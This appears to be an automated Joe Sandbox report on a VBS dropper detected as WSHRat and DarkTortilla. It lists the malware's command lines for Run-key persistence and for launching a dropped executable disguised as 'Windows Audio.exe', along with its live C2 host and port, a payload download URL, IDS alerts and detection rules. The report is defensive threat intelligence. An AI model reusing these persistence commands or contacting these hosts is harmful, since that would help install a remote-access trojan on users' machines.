Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER-25013-67789543AX.vbs

Overview

General Information

Sample name:ORDER-25013-67789543AX.vbs
Analysis ID:1665235
MD5:6b05858262470682bdc3297c6641a3db
SHA1:699d8a5aa6e559cc597db68a9125d804f1350b8a
SHA256:aba8289d1eacae0e2eac939d757b19a576667e4eb47c1d86cbee0ad73f0b3e1a
Tags:vbsuser-abuse_ch
Infos:

Detection

WSHRat, DarkTortilla
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected WSHRat
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Register Wscript In Run Key
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected WSHRAT
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops script or batch files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (has network functionality)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Tries to delay execution (extensive OutputDebugStringW loop)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to query the security center for anti-virus and firewall products
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7884 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 7932 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 8028 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\DPGLXM.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • wscript.exe (PID: 8076 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\adobe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • wscript.exe (PID: 8096 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\notepad.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • JaG.exe (PID: 8168 cmdline: "C:\Users\user\AppData\Local\Temp\JaG.exe" MD5: ADF762BBB2C8BE6A9D74FA8D12061864)
            • cmd.exe (PID: 7900 cmdline: "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • PING.EXE (PID: 2408 cmdline: ping 127.0.0.1 -n 65 MD5: B3624DD758CCECF93A1226CEF252CA12)
              • reg.exe (PID: 6096 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • cmd.exe (PID: 2136 cmdline: "cmd" /c ping 127.0.0.1 -n 72 > nul && copy "C:\Users\user\AppData\Local\Temp\JaG.exe" "C:\Users\user\Audio\Windows Audio.exe" && ping 127.0.0.1 -n 72 > nul && "C:\Users\user\Audio\Windows Audio.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 2236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • PING.EXE (PID: 3380 cmdline: ping 127.0.0.1 -n 72 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • wscript.exe (PID: 652 cmdline: "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 5872 cmdline: "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 480 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 6132 cmdline: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Houdini, WSHRATHoudini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.houdini
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: WSHRAT

{"C2 url": "lee44.kozow.com", "Port": "6892", "Install folder": "%temp%"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_WSHRATYara detected WSHRATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2596806001.000001E9CD392000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
      00000005.00000002.2290405716.00000000038D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
        00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
          00000003.00000003.1356330407.000001E9CB43A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WSHRATYara detected WSHRATJoe Security
            00000005.00000002.2287943742.00000000027D2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
              Click to see the 28 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              5.2.JaG.exe.4c30000.1.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                5.2.JaG.exe.38d1a10.0.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                  5.2.JaG.exe.4c30000.1.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                    5.2.JaG.exe.38d1a10.0.raw.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_8076.amsi.csvJoeSecurity_WSHRATYara detected WSHRATJoe Security
                        amsi64_5872.amsi.csvJoeSecurity_WSHRATYara detected WSHRATJoe Security
                          amsi64_480.amsi.csvJoeSecurity_WSHRATYara detected WSHRATJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Script Initiated Connection to Non-Local Network
                            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.168.7.12, DestinationIsIpv6: false, DestinationPort: 6892, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 8076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49717
                            Sigma detected: Script Interpreter Execution From Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7884, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , ProcessId: 7932, ProcessName: wscript.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7884, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , ProcessId: 7932, ProcessName: wscript.exe
                            Sigma detected: WScript or CScript Dropper
                            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", ProcessId: 7884, ProcessName: wscript.exe
                            Sigma detected: WScript or CScript Dropper - File
                            Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7884, TargetFilename: C:\Users\user\AppData\Local\Temp\rHMh.js
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Audio\Windows Audio.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg.exe
                            Sigma detected: Direct Autorun Keys Modification
                            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7900, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", ProcessId: 6096, ProcessName: reg.exe
                            Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\JaG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\JaG.exe, ParentProcessId: 8168, ParentProcessName: JaG.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", ProcessId: 7900, ProcessName: cmd.exe
                            Sigma detected: Script Initiated Connection
                            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.245.208.13, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7932, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49716
                            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", ProcessId: 7884, ProcessName: wscript.exe

                            Data Obfuscation

                            barindex
                            Sigma detected: Drops script at startup location
                            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 8076, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.js

                            Persistence and Installation Behavior

                            barindex
                            Sigma detected: Register Wscript In Run Key
                            Source: Registry Key setAuthor: Joe Security: Data: Details: wscript.exe //B "C:\Users\user\AppData\Local\Temp\adobe.js", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 8076, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-04-15T12:35:34.136315+020020274471Malware Command and Control Activity Detected192.168.2.449717104.168.7.126892TCP
                            2025-04-15T12:35:39.498219+020020274471Malware Command and Control Activity Detected192.168.2.449718104.168.7.126892TCP
                            2025-04-15T12:35:44.998596+020020274471Malware Command and Control Activity Detected192.168.2.449725104.168.7.126892TCP
                            2025-04-15T12:35:50.316032+020020274471Malware Command and Control Activity Detected192.168.2.449726104.168.7.126892TCP
                            2025-04-15T12:35:54.043709+020020274471Malware Command and Control Activity Detected192.168.2.449727104.168.7.126892TCP
                            2025-04-15T12:35:58.765901+020020274471Malware Command and Control Activity Detected192.168.2.449728104.168.7.126892TCP
                            2025-04-15T12:35:59.419689+020020274471Malware Command and Control Activity Detected192.168.2.449729104.168.7.126892TCP
                            2025-04-15T12:36:04.498367+020020274471Malware Command and Control Activity Detected192.168.2.449730104.168.7.126892TCP
                            2025-04-15T12:36:04.735249+020020274471Malware Command and Control Activity Detected192.168.2.449731104.168.7.126892TCP
                            2025-04-15T12:36:09.856223+020020274471Malware Command and Control Activity Detected192.168.2.449732104.168.7.126892TCP
                            2025-04-15T12:36:10.046901+020020274471Malware Command and Control Activity Detected192.168.2.449733104.168.7.126892TCP
                            2025-04-15T12:36:15.156468+020020274471Malware Command and Control Activity Detected192.168.2.449734104.168.7.126892TCP
                            2025-04-15T12:36:15.338671+020020274471Malware Command and Control Activity Detected192.168.2.449735104.168.7.126892TCP
                            2025-04-15T12:36:20.471293+020020274471Malware Command and Control Activity Detected192.168.2.449737104.168.7.126892TCP
                            2025-04-15T12:36:23.957380+020020274471Malware Command and Control Activity Detected192.168.2.449738104.168.7.126892TCP
                            2025-04-15T12:36:29.345942+020020274471Malware Command and Control Activity Detected192.168.2.449739104.168.7.126892TCP
                            2025-04-15T12:36:29.347964+020020274471Malware Command and Control Activity Detected192.168.2.449740104.168.7.126892TCP
                            2025-04-15T12:36:34.660930+020020274471Malware Command and Control Activity Detected192.168.2.449741104.168.7.126892TCP
                            2025-04-15T12:36:34.722463+020020274471Malware Command and Control Activity Detected192.168.2.449742104.168.7.126892TCP
                            2025-04-15T12:36:39.964927+020020274471Malware Command and Control Activity Detected192.168.2.449743104.168.7.126892TCP
                            2025-04-15T12:36:40.056719+020020274471Malware Command and Control Activity Detected192.168.2.449744104.168.7.126892TCP
                            2025-04-15T12:36:45.266532+020020274471Malware Command and Control Activity Detected192.168.2.449745104.168.7.126892TCP
                            2025-04-15T12:36:45.376709+020020274471Malware Command and Control Activity Detected192.168.2.449746104.168.7.126892TCP
                            2025-04-15T12:36:54.017418+020020274471Malware Command and Control Activity Detected192.168.2.449747104.168.7.126892TCP
                            2025-04-15T12:36:54.025394+020020274471Malware Command and Control Activity Detected192.168.2.449748104.168.7.126892TCP
                            2025-04-15T12:36:59.329775+020020274471Malware Command and Control Activity Detected192.168.2.449749104.168.7.126892TCP
                            2025-04-15T12:36:59.391943+020020274471Malware Command and Control Activity Detected192.168.2.449750104.168.7.126892TCP
                            2025-04-15T12:37:04.660579+020020274471Malware Command and Control Activity Detected192.168.2.449751104.168.7.126892TCP
                            2025-04-15T12:37:04.740778+020020274471Malware Command and Control Activity Detected192.168.2.449752104.168.7.126892TCP
                            2025-04-15T12:37:10.079567+020020274471Malware Command and Control Activity Detected192.168.2.449753104.168.7.126892TCP
                            2025-04-15T12:37:10.138169+020020274471Malware Command and Control Activity Detected192.168.2.449754104.168.7.126892TCP
                            2025-04-15T12:37:15.394057+020020274471Malware Command and Control Activity Detected192.168.2.449755104.168.7.126892TCP
                            2025-04-15T12:37:15.471862+020020274471Malware Command and Control Activity Detected192.168.2.449756104.168.7.126892TCP
                            2025-04-15T12:37:23.834702+020020274471Malware Command and Control Activity Detected192.168.2.449757104.168.7.126892TCP
                            2025-04-15T12:37:23.839817+020020274471Malware Command and Control Activity Detected192.168.2.449758104.168.7.126892TCP
                            2025-04-15T12:37:29.151615+020020274471Malware Command and Control Activity Detected192.168.2.449759104.168.7.126892TCP
                            2025-04-15T12:37:29.196725+020020274471Malware Command and Control Activity Detected192.168.2.449760104.168.7.126892TCP
                            2025-04-15T12:37:34.473351+020020274471Malware Command and Control Activity Detected192.168.2.449761104.168.7.126892TCP
                            2025-04-15T12:37:34.540511+020020274471Malware Command and Control Activity Detected192.168.2.449762104.168.7.126892TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-04-15T12:35:34.136315+020020175161Malware Command and Control Activity Detected192.168.2.449717104.168.7.126892TCP
                            2025-04-15T12:35:39.498219+020020175161Malware Command and Control Activity Detected192.168.2.449718104.168.7.126892TCP
                            2025-04-15T12:35:44.998596+020020175161Malware Command and Control Activity Detected192.168.2.449725104.168.7.126892TCP
                            2025-04-15T12:35:50.316032+020020175161Malware Command and Control Activity Detected192.168.2.449726104.168.7.126892TCP
                            2025-04-15T12:35:54.043709+020020175161Malware Command and Control Activity Detected192.168.2.449727104.168.7.126892TCP
                            2025-04-15T12:35:58.765901+020020175161Malware Command and Control Activity Detected192.168.2.449728104.168.7.126892TCP
                            2025-04-15T12:35:59.419689+020020175161Malware Command and Control Activity Detected192.168.2.449729104.168.7.126892TCP
                            2025-04-15T12:36:04.498367+020020175161Malware Command and Control Activity Detected192.168.2.449730104.168.7.126892TCP
                            2025-04-15T12:36:04.735249+020020175161Malware Command and Control Activity Detected192.168.2.449731104.168.7.126892TCP
                            2025-04-15T12:36:09.856223+020020175161Malware Command and Control Activity Detected192.168.2.449732104.168.7.126892TCP
                            2025-04-15T12:36:10.046901+020020175161Malware Command and Control Activity Detected192.168.2.449733104.168.7.126892TCP
                            2025-04-15T12:36:15.156468+020020175161Malware Command and Control Activity Detected192.168.2.449734104.168.7.126892TCP
                            2025-04-15T12:36:15.338671+020020175161Malware Command and Control Activity Detected192.168.2.449735104.168.7.126892TCP
                            2025-04-15T12:36:20.471293+020020175161Malware Command and Control Activity Detected192.168.2.449737104.168.7.126892TCP
                            2025-04-15T12:36:23.957380+020020175161Malware Command and Control Activity Detected192.168.2.449738104.168.7.126892TCP
                            2025-04-15T12:36:29.345942+020020175161Malware Command and Control Activity Detected192.168.2.449739104.168.7.126892TCP
                            2025-04-15T12:36:29.347964+020020175161Malware Command and Control Activity Detected192.168.2.449740104.168.7.126892TCP
                            2025-04-15T12:36:34.660930+020020175161Malware Command and Control Activity Detected192.168.2.449741104.168.7.126892TCP
                            2025-04-15T12:36:34.722463+020020175161Malware Command and Control Activity Detected192.168.2.449742104.168.7.126892TCP
                            2025-04-15T12:36:39.964927+020020175161Malware Command and Control Activity Detected192.168.2.449743104.168.7.126892TCP
                            2025-04-15T12:36:40.056719+020020175161Malware Command and Control Activity Detected192.168.2.449744104.168.7.126892TCP
                            2025-04-15T12:36:45.266532+020020175161Malware Command and Control Activity Detected192.168.2.449745104.168.7.126892TCP
                            2025-04-15T12:36:45.376709+020020175161Malware Command and Control Activity Detected192.168.2.449746104.168.7.126892TCP
                            2025-04-15T12:36:54.017418+020020175161Malware Command and Control Activity Detected192.168.2.449747104.168.7.126892TCP
                            2025-04-15T12:36:54.025394+020020175161Malware Command and Control Activity Detected192.168.2.449748104.168.7.126892TCP
                            2025-04-15T12:36:59.329775+020020175161Malware Command and Control Activity Detected192.168.2.449749104.168.7.126892TCP
                            2025-04-15T12:36:59.391943+020020175161Malware Command and Control Activity Detected192.168.2.449750104.168.7.126892TCP
                            2025-04-15T12:37:04.660579+020020175161Malware Command and Control Activity Detected192.168.2.449751104.168.7.126892TCP
                            2025-04-15T12:37:04.740778+020020175161Malware Command and Control Activity Detected192.168.2.449752104.168.7.126892TCP
                            2025-04-15T12:37:10.079567+020020175161Malware Command and Control Activity Detected192.168.2.449753104.168.7.126892TCP
                            2025-04-15T12:37:10.138169+020020175161Malware Command and Control Activity Detected192.168.2.449754104.168.7.126892TCP
                            2025-04-15T12:37:15.394057+020020175161Malware Command and Control Activity Detected192.168.2.449755104.168.7.126892TCP
                            2025-04-15T12:37:15.471862+020020175161Malware Command and Control Activity Detected192.168.2.449756104.168.7.126892TCP
                            2025-04-15T12:37:23.834702+020020175161Malware Command and Control Activity Detected192.168.2.449757104.168.7.126892TCP
                            2025-04-15T12:37:23.839817+020020175161Malware Command and Control Activity Detected192.168.2.449758104.168.7.126892TCP
                            2025-04-15T12:37:29.151615+020020175161Malware Command and Control Activity Detected192.168.2.449759104.168.7.126892TCP
                            2025-04-15T12:37:29.196725+020020175161Malware Command and Control Activity Detected192.168.2.449760104.168.7.126892TCP
                            2025-04-15T12:37:34.473351+020020175161Malware Command and Control Activity Detected192.168.2.449761104.168.7.126892TCP
                            2025-04-15T12:37:34.540511+020020175161Malware Command and Control Activity Detected192.168.2.449762104.168.7.126892TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://lee44.kozow.com:6892/is-readyVAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readybe.TARM~1Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyLAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyParrsAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready6-A4xAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready813S8RAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyOAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready862Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready13862-A4xAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready8076.amsi.csvAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readysAvira URL Cloud: Label: phishing
                            Source: lee44.kozow.comAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyXAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readytAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready/hAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyeAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready20Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyarasAvira URL Cloud: Label: phishing
                            Source: http://172.245.208.13/wex/ggh.jsAvira URL Cloud: Label: malware
                            Source: http://lee44.kozow.com:6892/is-readyem32Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com/14-4c59-bad8-9c31255dc46ahAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyzow.com:6892/is-readyPAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready-A4Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready4Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyadyEMAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready3Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready-A4xAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready38638Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyzow.com:6892/is-readysAvira URL Cloud: Label: phishing
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\notepad.jsAvira: detection malicious, Label: JS/Dldr.G8
                            Found malware configuration
                            Source: amsi64_8076.amsi.csvMalware Configuration Extractor: WSHRAT {"C2 url": "lee44.kozow.com", "Port": "6892", "Install folder": "%temp%"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeReversingLabs: Detection: 68%
                            Multi AV Scanner detection for submitted file
                            Source: ORDER-25013-67789543AX.vbsVirustotal: Detection: 13%Perma Link
                            Joe Sandbox ML detected suspicious sample
